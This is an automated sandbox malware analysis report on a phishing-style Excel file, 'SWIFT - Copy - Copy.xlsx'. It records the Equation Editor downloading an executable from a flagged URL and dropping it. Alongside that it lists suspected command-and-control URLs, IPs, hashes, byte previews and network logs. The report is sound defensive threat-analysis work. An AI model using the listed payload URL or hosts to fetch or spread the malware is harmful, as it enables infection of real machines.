                        http://www.fisioletsgo.com/i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684pfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.luckyfandom.com/i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684ptrue
                        • Avira URL Cloud: safe
                        		unknown
                        www.healingandhealthy.com/i6ro/true
                        • Avira URL Cloud: safe
                        		low
                        http://www.executive-air.net/i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684pfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://mikeloayza.com/E9/i4L.exetrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://investor.msn.comexplorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpfalse
                              		high
                              http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpfalse
                                		high
                                http://treyresearch.netexplorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpfalse
                                  		high
                                  http://java.sun.comexplorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmpfalse
                                    		high
                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmpfalse
                                      		high
                                      http://investor.msn.com/explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpfalse
                                        		high
                                        http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.499989252.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551993194.0000000004513000.00000004.00000001.sdmpfalse
                                          		high
                                          http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.%s.comPAexplorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmpfalse
                                          • URL Reputation: safe
                                          		low
                                          http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpfalse
                                            		high
                                            https://support.mozilla.orgexplorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpfalse
                                              		high
                                              http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.551082192.0000000003E50000.00000002.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              162.0.209.73
                                              		bitcointradel.comCanada
                                              		35893ACPCAtrue
                                              216.239.34.21
                                              		www.fisioletsgo.comUnited States
                                              		15169GOOGLEUSfalse
                                              118.67.131.217
                                              		www.luckyfandom.comKorea Republic of
                                              		24395CLEAR-AS-APClearNetworksPtyLtdAUtrue
                                              34.102.136.180
                                              		executive-air.netUnited States
                                              		15169GOOGLEUSfalse
                                              131.153.37.4
                                              		mikeloayza.comUnited States
                                              		20454SSASN2UStrue

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:553293
                                              Start date:14.01.2022
                                              Start time:16:03:14
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 7s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:SWIFT - Copy - Copy.xlsx
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:10
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winXLSX@9/6@6/5
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:
                                              • Successful, ratio: 25.8% (good quality ratio 24.8%)
                                              • Quality average: 71.7%
                                              • Quality standard deviation: 28.6%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 114
                                              • Number of non-executed functions: 41
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xlsx
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Active ActiveX Object
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              16:03:46API Interceptor106x Sleep call for process: EQNEDT32.EXE modified
                                              16:03:51API Interceptor74x Sleep call for process: Pcportk28.exe modified
                                              16:04:12API Interceptor215x Sleep call for process: wininit.exe modified
                                              16:04:57API Interceptor1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              118.67.131.217commercial invoice_010202201.exeGet hashmaliciousBrowse
                                              • www.friendschance.com/igwa/?JXRL2Htp=kcJK5GFpDKPtevBg1nN4AS2uwE6IDbqQL9Esa69lHd4fhlo3nfdugBZ3P+KHWdbb77iO&2dyD8R=k0GL
                                              product list.xlsxGet hashmaliciousBrowse
                                              • www.canvasb.net/n6fr/?U8=Tq3sB8hqGP08zpKNikSFkTYM2yQjd8k/meAwEMAvMB5SzjUo5qTtVsyXEnNf6niosm0nlg==&gp-83T=Xtxd2n1hUdmt
                                              DH146890Y.exeGet hashmaliciousBrowse
                                              • www.frontiervalley8.com/u5eh/?5jZ0yH=uh8othQVHLF/6zHJZZdPMo2k/QZrncPYfe97AgdLy2ZEmL8zQjvjOm0Ax+MDL5kTLyKfmhqLYA==&Cxlpd=4hu4_hnx
                                              D4L4075.exeGet hashmaliciousBrowse
                                              • www.frontiervalley8.com/u5eh/?-ZwxCph=uh8othQVHLF/6zHJZZdPMo2k/QZrncPYfe97AgdLy2ZEmL8zQjvjOm0Ax+M6UIEQFkWYmhqMLw==&od6X=8pNLiPPXtpt
                                              Minutes of Meeting 23.10.2021.exeGet hashmaliciousBrowse
                                              • www.ontactfactory.com/snec/?u6A=K4Bg8vtIRtuG13xcsudH6+oYDCyQsaEc56ljn8JSsb3Kl5A4x8QSyFSD/ohwVwuON5p7&mbi8J=1bstizF0enjhp8f
                                              Lv9eznkydx.exeGet hashmaliciousBrowse
                                              • withcook.net/index.php

                                              Domains

                                              No context

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              CLEAR-AS-APClearNetworksPtyLtdAUcommercial invoice_010202201.exeGet hashmaliciousBrowse
                                              • 118.67.131.217
                                              DxVvqovrYnGet hashmaliciousBrowse
                                              • 203.168.39.127
                                              product list.xlsxGet hashmaliciousBrowse
                                              • 118.67.131.217
                                              DH146890Y.exeGet hashmaliciousBrowse
                                              • 118.67.131.217
                                              D4L4075.exeGet hashmaliciousBrowse
                                              • 118.67.131.217
                                              Minutes of Meeting 23.10.2021.exeGet hashmaliciousBrowse
                                              • 118.67.131.217
                                              Lv9eznkydx.exeGet hashmaliciousBrowse
                                              • 118.67.131.217
                                              b3astmode.x86Get hashmaliciousBrowse
                                              • 118.67.0.7
                                              SSASN2UScIc4vLO33FGet hashmaliciousBrowse
                                              • 66.85.144.10
                                              zu6lzRqnng.exeGet hashmaliciousBrowse
                                              • 131.153.142.106
                                              x86Get hashmaliciousBrowse
                                              • 64.38.210.198
                                              SecuriteInfo.com.Trojan.Siggen16.10960.21391.exeGet hashmaliciousBrowse
                                              • 131.153.142.106
                                              IO11QGTU2c.exeGet hashmaliciousBrowse
                                              • 131.153.142.106
                                              U8JqcTK00dGet hashmaliciousBrowse
                                              • 66.85.144.28
                                              4Nis1gCp1X.exeGet hashmaliciousBrowse
                                              • 131.153.142.106
                                              5VV3QPmgy8Get hashmaliciousBrowse
                                              • 66.85.144.16
                                              kwari.x86Get hashmaliciousBrowse
                                              • 209.188.7.206
                                              3KzEktjDwJ.exeGet hashmaliciousBrowse
                                              • 66.85.185.107
                                              4voNJxxVOQ.exeGet hashmaliciousBrowse
                                              • 66.85.185.107
                                              SecuriteInfo.com.Trojan.DownLoader44.11112.23850.exeGet hashmaliciousBrowse
                                              • 66.85.185.107
                                              xd.armGet hashmaliciousBrowse
                                              • 108.170.53.117
                                              h1TYu4T867Get hashmaliciousBrowse
                                              • 66.85.156.247
                                              sora.arm7Get hashmaliciousBrowse
                                              • 192.198.194.139
                                              sora.x86Get hashmaliciousBrowse
                                              • 198.15.97.16
                                              xd.x86Get hashmaliciousBrowse
                                              • 198.15.85.48
                                              Software updated by Dylox.exeGet hashmaliciousBrowse
                                              • 131.153.142.106
                                              RFQ_Invoice verification.xlsxGet hashmaliciousBrowse
                                              • 131.153.37.3
                                              loeFlLTaic.exeGet hashmaliciousBrowse
                                              • 108.170.14.102
                                              ACPCAphantom.x86Get hashmaliciousBrowse
                                              • 162.22.50.145
                                              swaHv4o9AvGet hashmaliciousBrowse
                                              • 162.0.156.139
                                              J4I3oWIHfXGet hashmaliciousBrowse
                                              • 162.56.224.1
                                              DEC SOA_09012022.exeGet hashmaliciousBrowse
                                              • 162.0.223.146
                                              KLn7h2JLgtGet hashmaliciousBrowse
                                              • 162.54.31.21
                                              b0Ht6p5D1JGet hashmaliciousBrowse
                                              • 162.9.191.49
                                              85kOai8KfsGet hashmaliciousBrowse
                                              • 162.64.37.98
                                              armGet hashmaliciousBrowse
                                              • 162.52.209.57
                                              gx86Get hashmaliciousBrowse
                                              • 162.33.56.255
                                              SecuriteInfo.com.Linux.BackDoor.Tsunami.970.3006.9678Get hashmaliciousBrowse
                                              • 162.32.41.6
                                              gx86Get hashmaliciousBrowse
                                              • 162.64.26.233
                                              Fourloko.arm7-20211230-1450Get hashmaliciousBrowse
                                              • 162.60.248.101
                                              loligang.armGet hashmaliciousBrowse
                                              • 162.20.0.165
                                              4ozT5pZbJIGet hashmaliciousBrowse
                                              • 162.22.50.151
                                              sf3rG3tuCEGet hashmaliciousBrowse
                                              • 162.56.105.250
                                              1bQEi8dbIiGet hashmaliciousBrowse
                                              • 162.32.122.185
                                              4Gl2OeRw58Get hashmaliciousBrowse
                                              • 162.54.255.172
                                              3Drgtl4mCQGet hashmaliciousBrowse
                                              • 162.54.84.214
                                              61xHx9ExnVGet hashmaliciousBrowse
                                              • 162.128.106.179
                                              RqnH4I3303Get hashmaliciousBrowse
                                              • 162.52.204.153

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              7dcce5b76c8b17472d024758970a406binvoice payment 0098.ppaGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              FpgQY4ZKc4.docxGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              RmgO44zN8B.xlsxGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              o7GqaY5L5D.xlsxGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              PhishingAttachment.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              PhishingAttachment.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              SecuriteInfo.com.Trojan.Skarlet.3.Gen.16172.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              SecuriteInfo.com.Trojan.Agent.FRJZ.17141.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              123000871884.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              SecuriteInfo.com.Heur.26941.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              414729_45.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              48599571-6.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              SecuriteInfo.com.Heur.31259.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              SecuriteInfo.com.Trojan.Skarlet.3.Gen.2852.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              SecuriteInfo.com.Trojan.Skarlet.3.Gen.7952.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              SecuriteInfo.com.Trojan.Skarlet.3.Gen.5350.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              SecuriteInfo.com.Trojan.Skarlet.3.Gen.16272.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              SecuriteInfo.com.Heur.24531.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              SecuriteInfo.com.Trojan.Skarlet.3.Gen.19861.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4
                                              SecuriteInfo.com.Heur.15230.xlsmGet hashmaliciousBrowse
                                              • 131.153.37.4

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):601600
                                              Entropy (8bit):7.208019029819951
                                              Encrypted:false
                                              SSDEEP:12288:VK777777777777N7sPip0jsXSEf2V3SVP5AmeTZVYclQ3eRrYtf:VK777777777777lsKp0A3MC7CxS3YrY
                                              MD5:25EE51200E7D86AB2C531748E5C01C72
                                              SHA1:6BE3C75759C1F9428299B82394DEAFAD3B165D57
                                              SHA-256:33BB2954B5EFD072D71B4D7BF79EB609E4143A01023C15F8239F3A93561052E0
                                              SHA-512:B90110F86236C04D92405B7931606FFB82533863F7A141115A545C5C1949115298F4D1296C950D176CF33B1EB0A1489D76548A8E186168ADA03E1B25A420EA4F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              IE Cache URL:https://mikeloayza.com/E9/i4L.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.a.....................>........... ... ....@.. ....................................@.................................p...K.... ...:...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....:... ...<..................@..@.reloc.......`.......,..............@..B........................H.......,f...-......E.......6y............................................{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*....0.......... ........8....8....r...p.(......8....r;..p.(...... .....:....&8....r...p.(...... .....:....&.(.......(....9.... ........8........ ........8....r...p.(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\i4L[1].htm
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:HTML document, ASCII text
                                              Category:dropped
                                              Size (bytes):241
                                              Entropy (8bit):5.144431573763422
                                              Encrypted:false
                                              SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPfV8Ni+KqD:J0+ox0RJWWP98zT
                                              MD5:5C1BF763B986387E9E117DABF2FB37BC
                                              SHA1:29F8142D2580878381BBB0DFD7D333C924C24093
                                              SHA-256:9A0E4DD90EF8EFA0B54BBF9C1A810F227A9C4BA08AD315470A2BC519023F5DB0
                                              SHA-512:48397E5342820C32752A23EFC6D6776784ADA4950C591A21373B06DABA50467B489761C6018660D518B448A6B6F7121382DA33F916AC06905C1005952361B176
                                              Malicious:false
                                              Reputation:low
                                              Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://mikeloayza.com/E9/i4L.exe">here</a>.</p>.</body></html>.
                                              C:\Users\user\AppData\Local\Temp\7916.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.1464700112623651
                                              Encrypted:false
                                              SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                              MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                              SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                              SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                              SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\~DF01B9A0A507F75E4B.TMP
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1708032
                                              Entropy (8bit):7.361455956824453
                                              Encrypted:false
                                              SSDEEP:49152:+QKkr5BOPqqENGfJbDan2Kmg6RsOEX0q:+Q7sNEYNDw
                                              MD5:1A8EF3975ACA5EEFAE5D35CFA752A22B
                                              SHA1:D4400575CB198B054E2FEED616010C57AD07525F
                                              SHA-256:17026E92707F76D3A8BE214E3EEA223A2A7630E162923B159DF6193837E0F91F
                                              SHA-512:B14A70C0BA99CDA8231C3419AC1B5F0EDB1AD3C451BE2B9E449E5FBA5C771FE0E24604F61DBA8D107088DFAE67C3A213B5017CE59AC2F1EBEA452E9B0FEFAB45
                                              Malicious:false
                                              Reputation:low
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\Desktop\~$SWIFT - Copy - Copy.xlsx
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):165
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              C:\Users\Public\Pcportk28.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):601600
                                              Entropy (8bit):7.208019029819951
                                              Encrypted:false
                                              SSDEEP:12288:VK777777777777N7sPip0jsXSEf2V3SVP5AmeTZVYclQ3eRrYtf:VK777777777777lsKp0A3MC7CxS3YrY
                                              MD5:25EE51200E7D86AB2C531748E5C01C72
                                              SHA1:6BE3C75759C1F9428299B82394DEAFAD3B165D57
                                              SHA-256:33BB2954B5EFD072D71B4D7BF79EB609E4143A01023C15F8239F3A93561052E0
                                              SHA-512:B90110F86236C04D92405B7931606FFB82533863F7A141115A545C5C1949115298F4D1296C950D176CF33B1EB0A1489D76548A8E186168ADA03E1B25A420EA4F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.a.....................>........... ... ....@.. ....................................@.................................p...K.... ...:...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....:... ...<..................@..@.reloc.......`.......,..............@..B........................H.......,f...-......E.......6y............................................{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*....0.......... ........8....8....r...p.(......8....r;..p.(...... .....:....&8....r...p.(...... .....:....&.(.......(....9.... ........8........ ........8....r...p.(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......

                                              Static File Info

                                              General

                                              File type:Microsoft Excel 2007+
                                              Entropy (8bit):7.998825501408383
                                              TrID:
                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                              • ZIP compressed archive (8000/1) 16.67%
                                              File name:SWIFT - Copy - Copy.xlsx
                                              File size:1400294
                                              MD5:338cbe8a882d7c941afe2cf895055bd5
                                              SHA1:f081a9d12054b2e1a59d3eae4fa65059db634268
                                              SHA256:097ce13d935a168aa627794fce83fb57b3ad39989c46b574acb13820edbafe4a
                                              SHA512:544deb29896756b4391cd46cd0e76154c837530a5e2512ef03c6dc90145f98d43b6c7469625ad082bfc0929940177808e62d3deafd6412a626f1c0301adc32d6
                                              SSDEEP:24576:Ggp3MkrfAEnTlQdzPqdACoEh1GxdIGbHXMFxPrt/Qe6KxwfqI+WSKbjqRJc3satR:/Mkr1ZsPqkEDGbfbH4L2sESKbCc3Ptek
                                              File Content Preview:PK...........T>...............[Content_Types].xmlUT...C..aC..aC..a.U.N.0..#.....q........7.......m<...=...............3.xx.h\1..6.J...(..`..T....w".$..r.C%....|.o......=V.&.gR...QX.....Cj..k....TM@....R.O..G.C....@...{..V5.#.N....9(.O..+`.....Y.....7....x

                                              File Icon

                                              Icon Hash:e4e2aa8aa4b4bcb4

                                              Static OLE Info

                                              General

                                              Document Type:OpenXML
                                              Number of OLE Files:1

                                              OLE File "/opt/package/joesandbox/database/analysis/553293/sample/SWIFT - Copy - Copy.xlsx"

                                              Indicators

                                              Has Summary Info:False
                                              Application Name:unknown
                                              Encrypted Document:False
                                              Contains Word Document Stream:
                                              Contains Workbook/Book Stream:
                                              Contains PowerPoint Document Stream:
                                              Contains Visio Document Stream:
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:False

                                              Summary

                                              Author:
                                              Last Saved By:
                                              Create Time:2006-09-16T00:00:00Z
                                              Last Saved Time:2021-04-20T13:49:29Z
                                              Creating Application:Microsoft Excel
                                              Security:0

                                              Document Summary

                                              Thumbnail Scaling Desired:false
                                              Company:
                                              Contains Dirty Links:false
                                              Shared Document:false
                                              Changed Hyperlinks:false
                                              Application Version:12.0000

                                              Streams

                                              Stream Path: \x1oLe10nAtiVE, File Type: data, Stream Size: 1687673
                                              General
                                              Stream Path:\x1oLe10nAtiVE
                                              File Type:data
                                              Stream Size:1687673
                                              Entropy:7.35599527556
                                              Base64 Encoded:True
                                              Data ASCII:. ) ; . . 5 & . { . . . . . . . . . c % ~ . M . . 8 . . . . . . 5 . . . . 0 . . 2 Q . . . . . # . . . | . . . . . . . . E . u . V . / B ~ . . . . e S . z . . Q M p . & 5 . . . . . x . w v z . . W w . . . s . n . . 7 _ . . . . . . . < . . . / . . . . . . . k . K $ . B A h N . g . 4 . < s . . A # . . F A . . . . . . + . % . . . . ! . % . . J . . ! . . . P . . . T . B . v J d . . . . . V J g v . a . . . . . g . \\ t i ` . . K ) / . . v . . 4 . . . . . . ; . . = . . . . . . . 4 % . i d . w . . N c e . . . " .
                                              Data Raw:d0 29 3b 06 02 35 26 e3 7b ee 01 08 f7 a0 b8 bd bf e7 63 25 7e bd 4d 8c 8b 38 8b 0f ba b3 e6 15 35 81 c2 fd 80 30 cb 8b 32 51 ff d6 05 8d c2 23 01 05 02 7c e7 fe ff e0 e4 82 dd 0c 45 00 75 cc 56 d8 2f 42 7e a4 01 c7 20 b6 65 53 c3 7a f4 cc 51 4d 70 0d 26 35 fe b8 06 9c a4 78 89 77 76 7a e1 2e 57 77 06 a4 03 73 ff 6e bd 1a 37 5f 1b d5 a6 7f fe 8c ef 3c d1 a2 dc 2f b0 9d 9e f4 e8 ad
                                              Stream Path: HDsuMKhCbfmuqyxLqNuKc, File Type: empty, Stream Size: 0
                                              General
                                              Stream Path:HDsuMKhCbfmuqyxLqNuKc
                                              File Type:empty
                                              Stream Size:0
                                              Entropy:0.0
                                              Base64 Encoded:False
                                              Data ASCII:
                                              Data Raw:

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              01/14/22-16:06:04.365376TCP1201ATTACK-RESPONSES 403 Forbidden804917234.102.136.180192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 14, 2022 16:04:33.911838055 CET4916780192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.100852013 CET8049167131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.100967884 CET4916780192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.101399899 CET4916780192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.290345907 CET8049167131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.291004896 CET8049167131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.291089058 CET4916780192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.481738091 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.481784105 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.481870890 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.489912987 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.489944935 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.890429974 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.890625954 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.906006098 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.906070948 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.906405926 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.906527042 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.145149946 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.185965061 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.331522942 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.331724882 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.515368938 CET44349168131.153.37.4192.168.2.22
